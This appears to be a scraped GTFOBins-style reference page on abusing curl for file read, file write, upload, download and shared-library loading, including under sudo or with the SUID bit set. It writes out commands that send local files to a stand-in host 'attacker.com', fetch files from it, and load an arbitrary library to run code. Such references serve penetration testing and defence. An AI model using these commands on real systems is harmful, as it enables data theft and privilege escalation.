curl
File write
This executable can write data to local files.
- This function can be performed by any unprivileged user.
echo DATA >/path/to/temp-file curl file:///path/to/temp-file -o /path/to/output-fileThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.echo DATA >/path/to/temp-file curl file:///path/to/temp-file -o /path/to/output-fileThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.echo DATA >/path/to/temp-file curl file:///path/to/temp-file -o /path/to/output-file
File read
This executable can read data from local files.
- This function can be performed by any unprivileged user.
curl file:///path/to/input-fileThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.curl file:///path/to/input-fileThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.curl file:///path/to/input-file
Upload
This executable can upload local data.
- This function can be performed by any unprivileged user.
curl -X POST --data-binary @/path/to/input-file http://attacker.comThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.curl -X POST --data-binary @/path/to/input-file http://attacker.comThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.curl -X POST --data-binary @/path/to/input-file http://attacker.com - This function can be performed by any unprivileged user.
curl -X POST --data-binary DATA http://attacker.comThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.curl -X POST --data-binary DATA http://attacker.comThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.curl -X POST --data-binary DATA http://attacker.com - This function can be performed by any unprivileged user.
curl gopher://attacker.com:12345/_DATAThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.curl gopher://attacker.com:12345/_DATAThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.curl gopher://attacker.com:12345/_DATA
Download
This executable can download remote data.
- This function can be performed by any unprivileged user.
curl http://attacker.com/path/to/input-file -o /path/to/output-fileThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.curl http://attacker.com/path/to/input-file -o /path/to/output-fileThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.curl http://attacker.com/path/to/input-file -o /path/to/output-file
Library load
This executable can load shared libraries that may be used to run arbitrary code in the same execution context.
- This function can be performed by any unprivileged user.
curl --engine /path/to/lib.so xThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.curl --engine /path/to/lib.so xThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.curl --engine /path/to/lib.so x